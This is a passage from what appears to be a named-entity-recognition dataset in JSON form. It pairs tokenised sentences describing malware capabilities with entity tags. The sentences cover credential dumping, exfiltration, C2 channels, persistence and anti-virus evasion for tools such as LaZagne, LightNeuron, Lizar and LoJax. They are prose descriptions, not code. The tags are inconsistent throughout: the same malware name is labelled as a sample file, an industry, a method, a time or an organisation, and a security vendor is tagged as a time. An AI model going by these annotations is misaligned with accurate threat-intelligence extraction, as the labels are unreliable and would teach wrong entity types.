"can", - "obtain", - "credentials", - "from", - "web", - "browsers", - "such", - "as", - "Google", - "Chrome,", - "Internet", - "Explorer,", - "and", - "Firefox." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "I-Tool", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "LaZagne", - "can", - "obtain", - "credentials", - "from", - "macOS", - "Keychains." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LaZagne", - "can", - "perform", - "credential", - "dumping", - "from", - "LSA", - "secrets", - "to", - "obtain", - "account", - "and", - "password", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LaZagne", - "can", - "perform", - "credential", - "dumping", - "from", - "memory", - "to", - "obtain", - "account", - "and", - "password", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "LaZagne", - "can", - "use", - "the", - "`<PID>/maps`", - "and", - "`<PID>/mem`", - "files", - "to", - "identify", - "regex", - "patterns", - "to", - "dump", - "cleartext", - "passwords", - "from", - "the", - "browser's", - "process", - "memory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LaZagne", - "can", - "obtain", - "credentials", - "from", - "Vault", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "contains", - "a", - "function", - "to", - "encrypt", - "and", - "store", - "emails", - "that", - "it", - "collects." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "LightNeuron", - "can", - "be", - "configured", - "to", - "automatically", - "collect", - "files", - "under", - "a", - "specified", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "can", - "be", - "configured", - "to", - "automatically", - "exfiltrate", - "files", - "under", - "a", - "specified", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "can", - "collect", - "files", - "from", - "a", - "local", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "has", - "used", - "AES", - "and", - "XOR", - "to", - "decrypt", - "configuration", - "files", - "and", - "commands." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "encrypts", - "its", - "configuration", - "files", - "with", - "AES-256." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "LightNeuron", - "exfiltrates", - "data", - "over", - "its", - "email", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "has", - "a", - "function", - "to", - "delete", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "has", - "the", - "ability", - "to", - "download", - "and", - "execute", - "additional", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "can", - "store", - "email", - "data", - "in", - "files", - "and", - "directories", - "specified", - "in", - "its", - "configuration,", - "such", - "as", - "<code>C:\\Windows\\ServiceProfiles\\NetworkService\\appdata\\Local\\Temp\\</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "uses", - "SMTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "has", - "used", - "filenames", - "associated", - "with", - "Exchange", - "and", - "Outlook", - "for", - "binary", - "and", - "configuration", - "files,", - "such", - "as", - "<code>winmail.dat</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "LightNeuron", - "is", - "capable", - "of", - "starting", - "a", - "process", - "using", - "CreateProcess." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "LightNeuron", - "collects", - "Exchange", - "emails", - "matching", - "rules", - "specified", - "in", - "its", - "configuration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "can", - "be", - "configured", - "to", - "exfiltrate", - "data", - "during", - "nighttime", - "or", - "working", - "hours." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "is", - "controlled", - "via", - "commands", - "that", - "are", - "embedded", - "into", - "PDFs", - "and", - "JPGs", - "using", - "steganographic", - "methods." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "uses", - "AES", - "to", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "gathers", - "the", - "victim", - "computer", - "name", - "using", - "the", - "Win32", - "API", - "call", - "<code>GetComputerName</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "gathers", - "information", - "about", - "network", - "adapters", - "using", - "the", - "Win32", - "API", - "call", - "<code>GetAdaptersInfo</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "is", - "capable", - "of", - "modifying", - "email", - "content,", - "headers,", - "and", - "attachments", - "during", - "transit." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "has", - "used", - "a", - "malicious", - "Microsoft", - "Exchange", - "transport", - "agent", - "for", - "persistence." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LightNeuron", - "is", - "capable", - "of", - "executing", - "commands", - "via", - "cmd.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Linfo", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "obtain", - "data", - "from", - "local", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Linfo", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "change", - "C2", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Linfo", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "delete", - "files." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "B-Way", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Linfo", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "list", - "contents", - "of", - "drives", - "and", - "search", - "for", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Linfo", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "download", - "files", - "onto", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Linfo", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "retrieve", - "a", - "list", - "of", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Linfo", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "change", - "the", - "frequency", - "at", - "which", - "compromised", - "hosts", - "contact", - "remote", - "C2", - "infrastructure." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Linfo", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "retrieve", - "system", - "information." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Linfo", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "start", - "a", - "remote", - "shell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Linux", - "Rabbit", - "sends", - "the", - "payload", - "from", - "the", - "C2", - "server", - "as", - "an", - "encoded", - "URL", - "parameter." - ], - "ner_tags": [ - "I-SamFile", - "I-SamFile", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Linux", - "Rabbit", - "attempts", - "to", - "gain", - "access", - "to", - "the", - "server", - "via", - "SSH." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Linux", - "Rabbit", - "brute", - "forces", - "SSH", - "passwords", - "in", - "order", - "to", - "attempt", - "to", - "gain", - "access", - "and", - "install", - "its", - "malware", - "onto", - "the", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Linux", - "Rabbit", - "opens", - "a", - "socket", - "on", - "port", - "22", - "and", - "if", - "it", - "receives", - "a", - "response", - "it", - "attempts", - "to", - "obtain", - "the", - "machine's", - "hostname", - "and", - "Top-Level", - "Domain." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Linux", - "Rabbit", - "maintains", - "persistence", - "on", - "an", - "infected", - "machine", - "through", - "rc.local", - "and", - ".bashrc", - "files." - ], - "ner_tags": [ - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Linux", - "Rabbit", - "acquires", - "valid", - "SSH", - "accounts", - "through", - "brute", - "force." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LiteDuke", - "has", - "the", - "ability", - "to", - "decrypt", - "and", - "decode", - "multiple", - "layers", - "of", - "obfuscation." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "B-Features", - "I-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "LiteDuke", - "can", - "securely", - "delete", - "files", - "by", - "first", - "writing", - "random", - "data", - "to", - "the", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LiteDuke", - "has", - "the", - "ability", - "to", - "download", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "LiteDuke", - "can", - "query", - "the", - "Registry", - "to", - "check", - "for", - "the", - "presence", - "of", - "<code>HKCU\\Software\\KasperskyLab</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time" - ] - }, - { - "tokens": [ - "LiteDuke", - "can", - "create", - "persistence", - "by", - "adding", - "a", - "shortcut", - "in", - "the", - "<code>CurrentVersion\\Run</code>", - "Registry", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LiteDuke", - "has", - "the", - "ability", - "to", - "check", - "for", - "the", - "presence", - "of", - "Kaspersky", - "security", - "software." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O" - ] - }, - { - "tokens": [ - "LiteDuke", - "has", - "been", - "packed", - "with", - "multiple", - "layers", - "of", - "encryption." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LiteDuke", - "has", - "used", - "image", - "files", - "to", - "hide", - "its", - "loader", - "component." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LiteDuke", - "can", - "enumerate", - "the", - "CPUID", - "and", - "BIOS", - "version", - "on", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "B-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LiteDuke", - "has", - "the", - "ability", - "to", - "discover", - "the", - "proxy", - "configuration", - "of", - "Firefox", - "and/or", - "Opera." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "LiteDuke", - "can", - "enumerate", - "the", - "account", - "name", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LiteDuke", - "can", - "wait", - "30", - "seconds", - "before", - "executing", - "additional", - "code", - "if", - "security", - "software", - "is", - "detected." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LiteDuke", - "can", - "use", - "HTTP", - "GET", - "requests", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LitePower", - "can", - "send", - "collected", - "data,", - "including", - "screenshots,", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LitePower", - "has", - "the", - "ability", - "to", - "download", - "payloads", - "containing", - "system", - "commands", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LitePower", - "can", - "use", - "various", - "API", - "calls." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LitePower", - "can", - "use", - "a", - "PowerShell", - "script", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LitePower", - "can", - "query", - "the", - "Registry", - "for", - "keys", - "added", - "to", - "execute", - "COM", - "hijacking." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LitePower", - "can", - "create", - "a", - "scheduled", - "task", - "to", - "enable", - "persistence", - "mechanisms." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LitePower", - "can", - "take", - "system", - "screenshots", - "and", - "save", - "them", - "to", - "`%AppData%`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LitePower", - "can", - "identify", - "installed", - "AV", - "software." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LitePower", - "has", - "the", - "ability", - "to", - "list", - "local", - "drives", - "and", - "enumerate", - "the", - "OS", - "architecture." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "LitePower", - "can", - "determine", - "if", - "the", - "current", - "user", - "has", - "admin", - "privileges." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LitePower", - "can", - "use", - "HTTP", - "and", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "has", - "encrypted", - "data", - "before", - "sending", - "it", - "to", - "the", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "can", - "retrieve", - "browser", - "history", - "and", - "database", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "has", - "a", - "module", - "to", - "collect", - "usernames", - "and", - "passwords", - "stored", - "in", - "browsers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "can", - "decrypt", - "its", - "configuration", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "has", - "used", - "the", - "PowerKatz", - "plugin", - "that", - "can", - "be", - "loaded", - "into", - "the", - "address", - "space", - "of", - "a", - "PowerShell", - "process", - "through", - "reflective", - "DLL", - "loading." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "can", - "collect", - "email", - "accounts", - "from", - "Microsoft", - "Outlook", - "and", - "Mozilla", - "Thunderbird." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Lizar", - "can", - "support", - "encrypted", - "communications", - "between", - "the", - "client", - "and", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "can", - "download", - "additional", - "plugins,", - "files,", - "and", - "tools." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "can", - "run", - "Mimikatz", - "to", - "harvest", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "has", - "used", - "various", - "Windows", - "API", - "functions", - "on", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "can", - "execute", - "PE", - "files", - "in", - "the", - "address", - "space", - "of", - "the", - "specified", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "has", - "used", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Lizar", - "has", - "a", - "plugin", - "designed", - "to", - "obtain", - "a", - "list", - "of", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "can", - "migrate", - "the", - "loader", - "into", - "another", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-OffAct", - "I-OffAct", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "can", - "take", - "JPEG", - "screenshots", - "of", - "an", - "infected", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "can", - "search", - "for", - "processes", - "associated", - "with", - "an", - "anti-virus", - "product", - "from", - "list." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "can", - "collect", - "the", - "computer", - "name", - "from", - "the", - "machine,." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "can", - "retrieve", - "network", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Purp", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "has", - "a", - "plugin", - "to", - "retrieve", - "information", - "about", - "all", - "active", - "network", - "sessions", - "on", - "the", - "infected", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "can", - "collect", - "the", - "username", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "has", - "a", - "command", - "to", - "open", - "the", - "command-line", - "on", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lizar", - "has", - "a", - "plugin", - "that", - "can", - "retrieve", - "credentials", - "from", - "Internet", - "Explorer", - "and", - "Microsoft", - "Edge", - "using", - "`vaultcmd.exe`", - "and", - "another", - "that", - "can", - "collect", - "RDP", - "access", - "credentials", - "using", - "the", - "`CredEnumerateW`", - "function." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoFiSe", - "can", - "collect", - "files", - "into", - "password-protected", - "ZIP-archives", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoFiSe", - "can", - "collect", - "all", - "the", - "files", - "from", - "the", - "working", - "directory", - "every", - "three", - "hours", - "and", - "place", - "them", - "into", - "a", - "password-protected", - "archive", - "for", - "further", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoFiSe", - "has", - "been", - "executed", - "as", - "a", - "file", - "named", - "DsNcDiag.dll", - "through", - "side-loading." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "LoFiSe", - "can", - "collect", - "files", - "of", - "interest", - "from", - "targeted", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoFiSe", - "can", - "monitor", - "the", - "file", - "system", - "to", - "identify", - "files", - "less", - "than", - "6.4", - "MB", - "in", - "size", - "with", - "file", - "extensions", - "including", - ".doc,", - ".docx,", - ".xls,", - ".xlsx,", - ".ppt,", - ".pptx,", - ".pdf,", - ".rtf,", - ".tif,", - ".odt,", - ".ods,", - ".odp,", - ".eml,", - "and", - ".msg." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "LoFiSe", - "can", - "save", - "files", - "to", - "be", - "evaluated", - "for", - "further", - "exfiltration", - "in", - "the", - "`C:\\Programdata\\Microsoft\\`", - "and", - "`C:\\windows\\temp\\`", - "folders." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoJax", - "has", - "modified", - "the", - "Registry", - "key", - "<code>‘HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session", - "Manager\\BootExecute’</code>", - "from", - "<code>‘autocheck", - "autochk", - "*’</code>", - "to", - "<code>‘autocheck", - "autoche", - "*’</code>." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoJax", - "has", - "loaded", - "an", - "embedded", - "NTFS", - "DXE", - "driver", - "to", - "be", - "able", - "to", - "access", - "and", - "write", - "to", - "NTFS", - "partitions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "LoJax", - "has", - "modified", - "the", - "Registry", - "key", - "<code>‘HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session", - "Manager\\BootExecute’</code>", - "from", - "<code>‘autocheck", - "autochk", - "*’</code>", - "to", - "<code>‘autocheck", - "autoche", - "*’</code>", - "in", - "order", - "to", - "execute", - "its", - "payload", - "during", - "Windows", - "startup." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - 